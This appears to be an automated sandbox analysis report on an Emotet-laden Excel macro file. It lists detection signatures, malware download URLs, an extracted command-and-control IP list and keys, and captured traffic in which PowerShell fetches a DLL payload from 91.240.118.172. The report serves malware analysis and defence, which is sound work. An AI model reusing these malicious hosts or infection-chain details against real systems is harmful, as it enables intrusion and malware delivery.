Windows Analysis Report
NZW-010122 BNUV-280122.xlsm

Overview

General Information

Sample Name: NZW-010122 BNUV-280122.xlsm
Analysis ID: 562386
MD5: acbaebd7bb2090b795b481d48453b3fa
SHA1: a06b2a6d2a15d070262144854ea4ace65cb71892
SHA256: c81e4045b744f1e7aed46015f3f3a1de5078b95d908b966a56724965fb5b91e2
Infos:

Detection

Hidden Macro 4.0 Emotet
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Found malicious Excel 4.0 Macro
Found malware configuration
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Yara detected Emotet
Sigma detected: Windows Shell File Write to Suspicious Folder
Document contains OLE streams with names of living off the land binaries
Powershell drops PE file
Sigma detected: MSHTA Spawning Windows Shell
Hides that the sample has been downloaded from the Internet (zone.identifier)
Document exploit detected (process start blacklist hit)
Sigma detected: Suspicious MSHTA Process Patterns
Sigma detected: Microsoft Office Product Spawning Windows Shell
Sigma detected: Suspicious PowerShell Command Line
Found Excel 4.0 Macro with suspicious formulas
Machine Learning detection for dropped file
Sigma detected: Mshta Spawning Windows Shell
C2 URLs / IPs found in malware configuration
Drops PE files to the application program directory (C:\ProgramData)
Contains functionality to query locales information (e.g. system language)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to dynamically determine API calls
HTTP GET or POST without a user agent
Downloads executable code via HTTP
Abnormal high CPU Usage
Found a hidden Excel 4.0 Macro sheet
Potential document exploit detected (unknown TCP traffic)
Searches for the Microsoft Outlook file path
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Drops PE files to the windows directory (C:\Windows)
Found large amount of non-executed APIs
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality to delete services
Creates a process in suspended mode (likely to inject code)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Creates files inside the system directory
Internet Provider seen in connection with other malware
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Potential document exploit detected (performs DNS queries)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Enables debug privileges
PE file contains an invalid checksum
Yara detected Xls With Macro 4.0
Connects to several IPs in different countries
Potential key logger detected (key state polling based)
Creates a window with clipboard capturing capabilities
Document contains embedded VBA macros
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Potential document exploit detected (performs HTTP gets)

Classification

AV Detection
barindex
Antivirus detection for URL or domain
Source: http://sep.dfwsolar.club/hzh3v/zCUz44VgIrN/PE Avira URL Cloud: Label: phishing
Source: http://ancyh.xyz Avira URL Cloud: Label: malware
Source: http://firstfitschool.com/83wg6z/9TRIk5HsoTQiiVWoX/PE Avira URL Cloud: Label: malware
Source: http://mycloud.suplitecmo.com/Fox-CCFS/zBdGqiyW1HTZD2j/PE Avira URL Cloud: Label: malware
Source: http://sep.dfwsolar.club/hzh3v/z Avira URL Cloud: Label: malware
Source: http://journeypropertysolutions.com/cterq/FoPrW8qKzgIj3E8m/ Avira URL Cloud: Label: malware
Source: http://weezual.fr/ju9c/twEHJDCvNwGimD/ Avira URL Cloud: Label: malware
Source: http://danahousecare.com/wp-cont Avira URL Cloud: Label: malware
Source: http://chupahfashion.com/eh6bwxk/bowptl/F2sib90zZsqJ44/bQ8VXS/PE Avira URL Cloud: Label: malware
Source: http://mycloud.suplitecmo.com/Fox-CCFS/zBdGqiyW1HTZD2j/ Avira URL Cloud: Label: malware
Source: http://91.240.118.172/cc/vv/fe.png Avira URL Cloud: Label: malware
Source: http://danahousecare.com/wp-content/cache/nAZV1f5Bh9CFmBtl2J/PE Avira URL Cloud: Label: malware
Source: http://sep.dfwsolar.club/hzh3v/zCUz44VgIrN/ Avira URL Cloud: Label: phishing
Source: http://journeypropertysolutions.com/cterq/FoPrW8qKzgIj3E8m/PE Avira URL Cloud: Label: malware
Source: http://firstfitschool.com/83wg6z Avira URL Cloud: Label: phishing
Source: http://91.240.118.172/cc/vv/fe.html#H Avira URL Cloud: Label: malware
Source: https://lambayeque.apiperu.net.pe/assets/whnYzDBLH/ Avira URL Cloud: Label: malware
Source: http://ancyh.xyz/assets/Pcxv1k5/ Avira URL Cloud: Label: malware
Source: http://ancyh.xyz/assets/Pcxv1k5/PE Avira URL Cloud: Label: malware
Source: http://weezual.fr/ju9c/twEHJDCvNwGimD/PE Avira URL Cloud: Label: malware
Source: https://www.belajarngaji.shop/wp-admin/zVhSqHo7Fi2ulNeN1/ Avira URL Cloud: Label: malware
Source: https://lambayeque.apiperu.net.pe/assets/whnYzDBLH/PE Avira URL Cloud: Label: malware
Source: http://danahousecare.com/wp-content/cache/nAZV1f5Bh9CFmBtl2J/ Avira URL Cloud: Label: malware
Source: https://www.belajarngaji.shop/wp-admin/zVhSqHo7Fi2ulNeN1/PE Avira URL Cloud: Label: malware
Source: http://michaelcrompton.co.uk/wp-admin/G/ Avira URL Cloud: Label: malware
Source: http://michaelcrompton.co.uk/wp-admin/G/PE Avira URL Cloud: Label: malware
Source: http://chupahfashion.com/eh6bwxk Avira URL Cloud: Label: malware
Source: http://91.240.118.172/cc/vv/fe.html Avira URL Cloud: Label: malware
Source: http://chupahfashion.com/eh6bwxk/bowptl/F2sib90zZsqJ44/bQ8VXS/ Avira URL Cloud: Label: malware
Source: http://firstfitschool.com/83wg6z/9TRIk5HsoTQiiVWoX/ Avira URL Cloud: Label: malware
Found malware configuration
Source: 16.2.rundll32.exe.320000.3.unpack Malware Configuration Extractor: Emotet {"C2 list": ["160.16.102.168:80", "131.100.24.231:80", "200.17.134.35:7080", "207.38.84.195:8080", "212.237.56.116:7080", "58.227.42.236:80", "104.251.214.46:8080", "158.69.222.101:443", "192.254.71.210:443", "46.55.222.11:443", "45.118.135.203:7080", "107.182.225.142:8080", "103.75.201.2:443", "104.168.155.129:8080", "195.154.133.20:443", "159.8.59.82:8080", "110.232.117.186:8080", "45.142.114.231:8080", "41.76.108.46:8080", "203.114.109.124:443", "50.116.54.215:443", "209.59.138.75:7080", "185.157.82.211:8080", "164.68.99.3:8080", "162.214.50.39:7080", "138.185.72.26:8080", "178.63.25.185:443", "51.15.4.22:443", "81.0.236.90:443", "216.158.226.206:443", "45.176.232.124:443", "162.243.175.63:443", "212.237.17.99:8080", "45.118.115.99:8080", "129.232.188.93:443", "173.214.173.220:8080", "178.79.147.66:8080", "176.104.106.96:8080", "51.38.71.0:443", "173.212.193.249:8080", "217.182.143.207:443", "212.24.98.99:8080", "159.89.230.105:443", "79.172.212.216:8080", "212.237.5.209:443"], "Public Key": ["RUNLMSAAAADzozW1Di4r9DVWzQpMKT588RDdy7BPILP6AiDOTLYMHkSWvrQO5slbmr1OvZ2Pz+AQWzRMggQmAtO6rPH7nyx2", "RUNTMSAAAABAX3S2xNjcDD0fBno33Ln5t71eii+mofIPoXkNFOX1MeiwCh48iz97kB0mJjGGZXwardnDXKxI8GCHGNl0PFj5"]}
Machine Learning detection for dropped file
Source: C:\ProgramData\JooSee.dll Joe Sandbox ML: detected
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Source: Binary string: C:\Windows\dll\System.Management.Automation.pdb86)= source: powershell.exe, 00000006.00000002.676964302.0000000002877000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.pdbgement.Automation.pdbBB4 source: powershell.exe, 00000006.00000002.676964302.0000000002877000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\System.pdb: source: powershell.exe, 00000006.00000002.676964302.0000000002877000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdbFile source: powershell.exe, 00000006.00000002.676964302.0000000002877000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: m.Management.Automation.pdbpdbion.pdbProg source: powershell.exe, 00000006.00000002.676964302.0000000002877000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ws\System.pdbpdbtem.pdbIL source: powershell.exe, 00000006.00000002.676964302.0000000002877000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\System.pdbion source: powershell.exe, 00000006.00000002.676964302.0000000002877000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: >ystem.pdbm source: powershell.exe, 00000006.00000002.676964302.0000000002877000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\symbols\dll\System.pdb_3 source: powershell.exe, 00000006.00000002.676964302.0000000002877000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.pdb source: powershell.exe, 00000006.00000002.676964302.0000000002877000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.pdb8 source: powershell.exe, 00000006.00000002.676964302.0000000002877000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\dll\System.pdben source: powershell.exe, 00000006.00000002.676964302.0000000002877000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000006.00000002.676964302.0000000002877000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10021854 __EH_prolog3,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA, 9_2_10021854
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_10021854 __EH_prolog3,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA, 11_2_10021854
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 16_2_002B7E00 FindFirstFileW, 16_2_002B7E00

Software Vulnerabilities
barindex
Document exploit detected (process start blacklist hit)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\cmd.exe
Potential document exploit detected (unknown TCP traffic)
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 91.240.118.172:80
Potential document exploit detected (performs DNS queries)
Source: global traffic DNS query: name: weezual.fr
Potential document exploit detected (performs HTTP gets)
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 91.240.118.172:80

Networking
barindex
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic Snort IDS: 2034631 ET TROJAN Maldoc Activity (set) 192.168.2.22:49168 -> 91.240.118.172:80
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 160.16.102.168 80 Jump to behavior
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor IPs: 160.16.102.168:80
Source: Malware configuration extractor IPs: 131.100.24.231:80
Source: Malware configuration extractor IPs: 200.17.134.35:7080
Source: Malware configuration extractor IPs: 207.38.84.195:8080
Source: Malware configuration extractor IPs: 212.237.56.116:7080
Source: Malware configuration extractor IPs: 58.227.42.236:80
Source: Malware configuration extractor IPs: 104.251.214.46:8080
Source: Malware configuration extractor IPs: 158.69.222.101:443
Source: Malware configuration extractor IPs: 192.254.71.210:443
Source: Malware configuration extractor IPs: 46.55.222.11:443
Source: Malware configuration extractor IPs: 45.118.135.203:7080
Source: Malware configuration extractor IPs: 107.182.225.142:8080
Source: Malware configuration extractor IPs: 103.75.201.2:443
Source: Malware configuration extractor IPs: 104.168.155.129:8080
Source: Malware configuration extractor IPs: 195.154.133.20:443
Source: Malware configuration extractor IPs: 159.8.59.82:8080
Source: Malware configuration extractor IPs: 110.232.117.186:8080
Source: Malware configuration extractor IPs: 45.142.114.231:8080
Source: Malware configuration extractor IPs: 41.76.108.46:8080
Source: Malware configuration extractor IPs: 203.114.109.124:443
Source: Malware configuration extractor IPs: 50.116.54.215:443
Source: Malware configuration extractor IPs: 209.59.138.75:7080
Source: Malware configuration extractor IPs: 185.157.82.211:8080
Source: Malware configuration extractor IPs: 164.68.99.3:8080
Source: Malware configuration extractor IPs: 162.214.50.39:7080
Source: Malware configuration extractor IPs: 138.185.72.26:8080
Source: Malware configuration extractor IPs: 178.63.25.185:443
Source: Malware configuration extractor IPs: 51.15.4.22:443
Source: Malware configuration extractor IPs: 81.0.236.90:443
Source: Malware configuration extractor IPs: 216.158.226.206:443
Source: Malware configuration extractor IPs: 45.176.232.124:443
Source: Malware configuration extractor IPs: 162.243.175.63:443
Source: Malware configuration extractor IPs: 212.237.17.99:8080
Source: Malware configuration extractor IPs: 45.118.115.99:8080
Source: Malware configuration extractor IPs: 129.232.188.93:443
Source: Malware configuration extractor IPs: 173.214.173.220:8080
Source: Malware configuration extractor IPs: 178.79.147.66:8080
Source: Malware configuration extractor IPs: 176.104.106.96:8080
Source: Malware configuration extractor IPs: 51.38.71.0:443
Source: Malware configuration extractor IPs: 173.212.193.249:8080
Source: Malware configuration extractor IPs: 217.182.143.207:443
Source: Malware configuration extractor IPs: 212.24.98.99:8080
Source: Malware configuration extractor IPs: 159.89.230.105:443
Source: Malware configuration extractor IPs: 79.172.212.216:8080
Source: Malware configuration extractor IPs: 212.237.5.209:443
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /cc/vv/fe.png HTTP/1.1Host: 91.240.118.172Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /ju9c/twEHJDCvNwGimD/ HTTP/1.1Host: weezual.frConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /Fox-CCFS/zBdGqiyW1HTZD2j/ HTTP/1.1Host: mycloud.suplitecmo.comConnection: Keep-Alive
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKConnection: Keep-AliveKeep-Alive: timeout=5, max=100x-powered-by: PHP/7.4.27set-cookie: 61f44686eb699=1643398790; expires=Fri, 28-Jan-2022 19:40:50 GMT; Max-Age=60; path=/cache-control: no-cache, must-revalidatepragma: no-cachelast-modified: Fri, 28 Jan 2022 19:39:50 GMTexpires: Fri, 28 Jan 2022 19:39:50 GMTcontent-type: application/x-msdownloadcontent-disposition: attachment; filename="10ZDUhs9FtE0wMo.dll"content-transfer-encoding: binarycontent-length: 548864date: Fri, 28 Jan 2022 19:39:50 GMTserver: LiteSpeedData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 68 73 c2 61 2c 12 ac 32 2c 12 ac 32 2c 12 ac 32 ef 1d f3 32 26 12 ac 32 ef 1d f1 32 37 12 ac 32 2c 12 ad 32 0e 10 ac 32 0b d4 d1 32 36 12 ac 32 0b d4 c1 32 a6 12 ac 32 0b d4 c2 32 b2 12 ac 32 0b d4 d6 32 2d 12 ac 32 0b d4 d0 32 2d 12 ac 32 0b d4 d4 32 2d 12 ac 32 52 69 63 68 2c 12 ac 32 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 3e fa f3 61 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 08 00 00 50 04 00 00 00 04 00 00 00 00 00 06 0d 03 00 00 10 00 00 00 60 04 00 00 00 00 10 00 10 00 00 00 10 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 a0 08 00 00 10 00 00 98 df 08 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 40 2d 05 00 52 00 00 00 34 10 05 00 04 01 00 00 00 a0 05 00 50 56 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 00 30 4e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 bd 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 60 04 00 94 05 00 00 ac 0f 05 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 39 45 04 00 00 10 00 00 00 50 04 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 92 cd 00 00 00 60 04 00 00 d0 00 00 00 60 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 80 65 00 00 00 30 05 00 00 30 00 00 00 30 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 50 56 02 00 00 a0 05 00 00 60 02 00 00 60 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 62 93 00 00 00 00 08 00 00 a0 00 00 00 c0 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program c
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /cc/vv/fe.html HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 91.240.118.172Connection: Keep-Alive
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: OnlineSASFR OnlineSASFR
Source: Joe Sandbox View ASN Name: S-NET-ASPL S-NET-ASPL
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 195.154.133.20 195.154.133.20
Source: Joe Sandbox View IP Address: 185.157.82.211 185.157.82.211
Connects to several IPs in different countries
Source: unknown Network traffic detected: IP country count 21
Source: powershell.exe, 00000006.00000002.679989773.0000000003641000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://91.240.11
Source: powershell.exe, 00000006.00000002.680618070.0000000003795000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.679989773.0000000003641000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://91.240.118.172
Source: mshta.exe, 00000004.00000003.420818085.000000000041D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.439097274.0000000003CF6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://91.240.118.172/cc/vv/fe.html
Source: mshta.exe, 00000004.00000003.436214904.000000000041D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.438128891.000000000041D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.420818085.000000000041D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://91.240.118.172/cc/vv/fe.html#H
Source: mshta.exe, 00000004.00000003.436133193.00000000003EB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.420800489.00000000003EB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.437986864.00000000003EB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://91.240.118.172/cc/vv/fe.html(
Source: NZW-010122 BNUV-280122.xls.0.dr String found in binary or memory: http://91.240.118.172/cc/vv/fe.htmlB
Source: mshta.exe, 00000004.00000002.437253347.000000000036E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://91.240.118.172/cc/vv/fe.htmlT
Source: mshta.exe, 00000004.00000002.437108931.0000000000330000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://91.240.118.172/cc/vv/fe.htmlWinSta0
Source: mshta.exe, 00000004.00000003.422944437.0000000002DFD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://91.240.118.172/cc/vv/fe.htmlfunction
Source: mshta.exe, 00000004.00000003.422354344.0000000002DF5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://91.240.118.172/cc/vv/fe.htmlhttp://91.240.118.172/cc/vv/fe.html
Source: mshta.exe, 00000004.00000002.437253347.000000000036E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://91.240.118.172/cc/vv/fe.htmli
Source: mshta.exe, 00000004.00000002.437108931.0000000000330000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://91.240.118.172/cc/vv/fe.htmlmshta
Source: mshta.exe, 00000004.00000002.437253347.000000000036E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://91.240.118.172/cc/vv/fe.htmlngs
Source: mshta.exe, 00000004.00000003.420780191.00000000003B8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://91.240.118.172/cc/vv/fe.htmly
Source: powershell.exe, 00000006.00000002.679989773.0000000003641000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://91.240.118.172/cc/vv/fe.p
Source: powershell.exe, 00000006.00000002.679989773.0000000003641000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.682696599.000000001B91A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://91.240.118.172/cc/vv/fe.png
Source: powershell.exe, 00000006.00000002.679989773.0000000003641000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://91.240.118.172/cc/vv/fe.pngPE
Source: powershell.exe, 00000006.00000002.680618070.0000000003795000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ancyh.xyz
Source: powershell.exe, 00000006.00000002.680618070.0000000003795000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ancyh.xyz/assets/Pcxv1k5/
Source: powershell.exe, 00000006.00000002.680618070.0000000003795000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ancyh.xyz/assets/Pcxv1k5/PE
Source: powershell.exe, 00000006.00000002.680618070.0000000003795000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://chupahfashion.com/eh6bwxk
Source: powershell.exe, 00000006.00000002.680618070.0000000003795000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://chupahfashion.com/eh6bwxk/bowptl/F2sib90zZsqJ44/bQ8VXS/
Source: powershell.exe, 00000006.00000002.680618070.0000000003795000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://chupahfashion.com/eh6bwxk/bowptl/F2sib90zZsqJ44/bQ8VXS/PE
Source: rundll32.exe, 00000010.00000002.677004385.000000000058A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000002.677036027.00000000005A6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
Source: rundll32.exe, 00000010.00000002.677036027.00000000005A6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: rundll32.exe, 00000010.00000002.677004385.000000000058A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000002.677036027.00000000005A6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.entrust.net/server1.crl0
Source: rundll32.exe, 00000010.00000002.677072808.00000000005CC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: rundll32.exe, 00000010.00000002.677004385.000000000058A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: rundll32.exe, 00000010.00000002.677036027.00000000005A6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
Source: rundll32.exe, 00000010.00000002.677072808.00000000005CC000.00000004.00000020.00020000.00000000.sdmp, 77EC63BDA74BD0D0E0426DC8F80085060.16.dr String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: rundll32.exe, 00000010.00000002.677072808.00000000005CC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/enZ6oW.
Source: powershell.exe, 00000006.00000002.680618070.0000000003795000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://danahousecare.com/wp-cont
Source: powershell.exe, 00000006.00000002.680618070.0000000003795000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://danahousecare.com/wp-content/cache/nAZV1f5Bh9CFmBtl2J/
Source: powershell.exe, 00000006.00000002.680618070.0000000003795000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://danahousecare.com/wp-content/cache/nAZV1f5Bh9CFmBtl2J/PE
Source: powershell.exe, 00000006.00000002.680618070.0000000003795000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://firstfitschool.com/83wg6z
Source: powershell.exe, 00000006.00000002.680618070.0000000003795000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://firstfitschool.com/83wg6z/9TRIk5HsoTQiiVWoX/
Source: powershell.exe, 00000006.00000002.680618070.0000000003795000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://firstfitschool.com/83wg6z/9TRIk5HsoTQiiVWoX/PE
Source: powershell.exe, 00000006.00000002.680618070.0000000003795000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://journeypropertysolutions.com/cterq/FoPrW8qKzgIj3E8m/
Source: powershell.exe, 00000006.00000002.680618070.0000000003795000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://journeypropertysolutions.com/cterq/FoPrW8qKzgIj3E8m/PE
Source: powershell.exe, 00000006.00000002.680618070.0000000003795000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://michaelcrompton.co.uk/wp-
Source: powershell.exe, 00000006.00000002.680618070.0000000003795000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://michaelcrompton.co.uk/wp-admin/G/
Source: powershell.exe, 00000006.00000002.680618070.0000000003795000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://michaelcrompton.co.uk/wp-admin/G/PE
Source: powershell.exe, 00000006.00000002.680618070.0000000003795000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mycloud.s
Source: powershell.exe, 00000006.00000002.680618070.0000000003795000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mycloud.suplitecmo.com
Source: powershell.exe, 00000006.00000002.680618070.0000000003795000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mycloud.suplitecmo.com/Fo
Source: powershell.exe, 00000006.00000002.680618070.0000000003795000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mycloud.suplitecmo.com/Fox-CCFS/zBdGqiyW1HTZD2j/
Source: powershell.exe, 00000006.00000002.680618070.0000000003795000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mycloud.suplitecmo.com/Fox-CCFS/zBdGqiyW1HTZD2j/PE
Source: rundll32.exe, 00000010.00000002.677004385.000000000058A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000002.677036027.00000000005A6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.comodoca.com0
Source: rundll32.exe, 00000010.00000002.677036027.00000000005A6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.comodoca.com0%
Source: rundll32.exe, 00000010.00000002.677004385.000000000058A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.comodoca.com0-
Source: rundll32.exe, 00000010.00000002.677004385.000000000058A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000002.677036027.00000000005A6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.comodoca.com0/
Source: rundll32.exe, 00000010.00000002.677004385.000000000058A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.comodoca.com05
Source: rundll32.exe, 00000010.00000002.677004385.000000000058A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000002.677036027.00000000005A6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.entrust.net03
